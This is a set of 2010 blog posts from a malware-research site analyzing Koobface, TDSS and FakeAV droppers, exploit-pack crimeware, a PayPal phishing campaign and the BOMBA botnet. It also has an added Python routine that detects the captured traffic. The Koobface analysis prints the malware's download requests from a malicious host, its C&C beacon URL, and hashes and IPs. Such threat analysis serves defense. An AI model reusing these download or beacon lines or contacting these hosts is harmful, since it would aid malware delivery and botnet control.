MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

25.7.10

Koobface circuit from 91.188.59.10 (BKCNET "SIA" IZZI)

After several months without news of Koobface, at least in its typical propagation using the classic fake YouTube screen as cover for the attack, it is back with another propagation season.

This time its spread still relies on visual social engineering, but not on the usual YouTube video template; it uses a page with pornographic content instead.


As shown in the capture, when you attempt to access any of the supposed videos, a small window warns that a codec needs to be downloaded. Accepting it downloads Koobface disguised as a binary called codec.exe (5910e59d592781cec3234abf57f8d000) from IP address 91.188.59.10, the address the domain 1zabslwvn538n4i5tcjl.com resolves to. This IP has been used to propagate Koobface since March 2010.

In addition, the page contains an embedded script that redirects traffic to download a PDF file containing an exploit for CVE-2008-2992.


The same IP also makes clear that its administration is being carried out through a known crimeware: YES Exploit System.


The executable codec.exe is packed with UPX (UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo). When run, it generates a BAT file (which deletes itself afterwards) with instructions for contacting the C&C, providing access to 1zabslwvn538n4i5tcjl.com, from which it drops the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

The BAT contains the following instruction for connecting to and sending information to the C&C:

http://urodinam.net/33t.php?stime=1280078675
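An added example (not code from the original post) that turns the captured download requests and the BAT's check-in URL above into a small detection routine: it flags downloads of the two droppers from the host named in the post and decodes the stime parameter, which I assume is a Unix epoch timestamp (the value quoted in the post decodes to the day of this write-up). The sample request text is constructed from the requests quoted above plus one benign request.

```python
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the two requests quoted in the post plus one benign request.
RAW_REQUESTS = """\
GET /dm.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com

GET /wsc.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com

GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0
Host: www.example.com
"""

# Indicators as given in the post: drop host, payload names and the C&C URL.
DROP_HOST = "1zabslwvn538n4i5tcjl.com"
DROP_PAYLOADS = {"/dm.exe": "TDSS", "/wsc.exe": "Koobface"}
CC_HOST = "urodinam.net"
CC_PATH = "/33t.php"


def parse_requests(raw):
    """Split raw HTTP request text into (method, path, headers) tuples."""
    parsed = []
    for block in raw.strip().split("\n\n"):
        lines = block.splitlines()
        method, path, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        parsed.append((method, path, headers))
    return parsed


def classify_request(method, path, headers):
    """Label a request that fetches one of the droppers from the drop host, else None."""
    host = headers.get("host", "").lower()
    if method == "GET" and host == DROP_HOST and path in DROP_PAYLOADS:
        return f"{DROP_PAYLOADS[path]} download from {host}{path}"
    return None


def parse_beacon(url):
    """Decode the C&C check-in URL: (host, stime as UTC datetime), or None if it does not match."""
    parts = urlsplit(url)
    if parts.hostname != CC_HOST or parts.path != CC_PATH:
        return None
    query = parse_qs(parts.query)
    stime = query.get("stime", [""])[0]
    if not stime.isdigit():
        return None
    # Assumption: stime is seconds since the Unix epoch.
    return parts.hostname, datetime.fromtimestamp(int(stime), tz=timezone.utc)


def scan(raw=RAW_REQUESTS):
    """Return the labels of every flagged request in the captured text."""
    hits = []
    for method, path, headers in parse_requests(raw):
        label = classify_request(method, path, headers)
        if label:
            hits.append(label)
    return hits
```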

This domain sits on the same IP address, 91.188.59.10, with instructions to download other malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue copy of Security Essentials 2010. It connects to getexepizdec.com (91.188.59.211), from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48), and to getmsdfgee54.com (88.80.4.19), from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik), which has a very low detection rate.

In short, the Koobface circuit run from BKCNET "SIA" IZZI involves different, interrelated parts of the criminal scene sharing the same goal: $$$$$ (feeding the underground economy), and leaving behind a real portfolio of malware.

The host 91.188.59.10 is managed by a known crimeware that costs around $1000 on the underground market and is tasked with directing the download of other malware onto the victim's computer, coordinated by business partners who increase their profits with each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partners


16.7.10

Defacement by "Exploit Pack's"

Defacement attacks, generally attributed to hacktivism and often to so-called "script kiddies" (although I now think the best description for this kind of bad guy is: aspiring criminal), have crossed into the criminal scene as a kind of whim or grievance against certain exploit packs that have particular vulnerabilities, and we have already begun to see some examples. However, this does not curtail the criminal activities of the botmaster.

The image below shows a "blind defacement" against Eleonore Exploit Pack, meaning it can only be seen once the botmaster's authentication process has been circumvented:

In the following case (found by Francisco Ruiz of the MalwareIntelligence team), the defacement was made against a SpyEye.

Other crimeware that could be prone to this are:
Within the research community one could say that looking for vulnerabilities in crimeware is a common activity, even a hobby if I may say so, although from any point of view the aim here is to deface. Without doubt, competition between "fans" of certain crimeware, "patriots" seeking to annoy criminal activity by country of origin, and computer thieves who steal "clients" from other computer thieves are becoming side activities within the crime ecosystem.

Related information
YES Exploit System and Crimeware-as-a-Service
State of the art in Eleonore Exploit Pack II
SpyEye Bot (Part two). Conversations with the creator of the crimeware
Liberty Exploit System. Another crimeware alternative for botnet control
ZoPAck. A new alternative for exploiting vulnerabilities


11.7.10

YES Exploit System and Crimeware-as-a-Service

In recent years the Cloud Computing phenomenon has become a real turning point as far as information security is concerned; the main controversy is not so much about the protection mechanisms its architectures can implement, but rather about the lack of trust that still exists regarding who should make the decisions needed to adopt this style of service.

However, for offenders Cloud Computing security is undoubtedly neither a problem nor a constraint; it further fuels the underground economy and, in some ways, this technology is adapted to offer "differentiating" alternatives in the competitive scenario posed by the crimeware business.

YES Exploit System, one of many systems that automate the exploitation of vulnerabilities to recruit zombies, is exactly that.

Using a layout that, visually, has nothing to envy any of the operating systems supported and used by "the cloud", it is confined solely to providing the options needed for the activities of criminal interest. This makes it clear that the developers of these applications are fully aware of the criminal needs of their "clients".

It even implements counterintelligence mechanisms whose objectives are, first, to check the reputation of the domain (Domain checker) used for the criminal maneuvers, automatically checking it against the main services that maintain databases of fraudulent URLs, including ZeuS Tracker, our friends at MDL (MalwareDomainList), SiteAdvisor, Norton List, etc., besides being able to manually add any other service not included by default by manipulating the code of certain files.

Second, checking the malware being spread against antivirus engines (AV Checker). Both "criminal remedies" were born as a result of the high growth of and demand for these types of crimeware.

One of the latest campaigns run through the latest YES Exploit System was the spread of the ransomware family seen in the image:

Chronologically, this crimeware has gone through three generations, and its business model is no longer just a matter of covert operation in certain underground forums; in addition, sales are made through partners, via the web, using ICQ as the main communication channel.


YES Exploit System closely resembles a conventional business scheme, but one designed exclusively for criminal purposes. Considering that among the many resources already created to support crimeware there is DataBase-as-a-Service (DBaaS), it should not be surprising to find during the research process that the "customer base" of YES-ES (or of another crimeware) is also supported from "the cloud" and hosted by a "third party".

Related information
YES Exploit System. Manipulating the attacker's security
YES Exploit System. Another crimeware made in Russia


4.7.10

PayPal phishing campaign by "Newbie Hacker Community"

Phishing attacks are increasingly common and are no longer confined, as they were at the beginning, to using only banks as cover; any service offered over the Internet that requires a username and password will sooner or later become a target for criminals.

PayPal isn't a new service; it was one of the first to offer e-commerce services, and its image is one of the most commonly used for phishing. Starting today, July 4 (U.S. Independence Day), a massive phishing campaign against PayPal has been active.

Some of the addresses used are:


Behind these attacks is a group of criminals who, under the name "Newbie Hacker Community", run the phishing campaign.

The defacement seen in the image acts as the perpetrators' seal on each of the sites involved, which host the fake PayPal page along with the fraudulent file package.

Updated 04.07.2010
New active domains. Unlike the first "batch" of vulnerable sites, in this case the phishing package is housed in the /~radiocon/ folder, and on all of them a backdoor (PHP shell) was implanted through the file uk.php.

Related information
Besouro film website violated, PayPal phishing attacks
Campaign phishing to Claro Argentina
Phishing database VI
Hooters Germany website compromised for HSBC phishing
New phishing campaign against Facebook led by Zeus
Phishing campaign aimed at players Zynga
Dissection of a fraudulent package. Wachovia phishing attack


3.7.10

BOMBA Botnet. A new crimeware alternative fuelling the criminal economy

In a recent investigation, Francisco Ruiz, Crimeware Researcher at MalwareIntelligence, broke through the security barriers of a new crimeware designed to automate the recruitment of zombies and the mass execution of cyber crimes, carried out using the compromised machines that form part of the botnet as the attack vector.

This is BOMBA, which is accessed via the web and whose authentication system relies only on a password, an access scheme adopted by many applications of this kind, notably Phoenix Exploit's Kit and n0ise Bot.


The server hosting this crimeware is based in Latvia (although the administrative record is in Moscow, Russia) under AS6851 (Autonomous System), known as the BKCNET "SIA" IZZI network.

This ASN is listed for criminal activities such as spreading rogue software and hosting kits like YES Exploit System; in 2009 it hosted infrastructure of the Waledac botnet (successor to Storm) and of ZeuS, and it also has a direct relationship with the criminals behind the maneuvers of the Koobface botnet.


The package is designed to exploit vulnerabilities across the Microsoft family of operating systems, as shown in the illustration below (Windows XP, Windows Vista and Windows 7), through precompiled exploits for Java (Java Deployment Toolkit), Internet Explorer, Adobe Reader and the classic MDAC.

While it does not present a structurally complex alternative, it is nonetheless a serious threat that adds to criminal demand and inserts itself into the circuit of illegal actions.
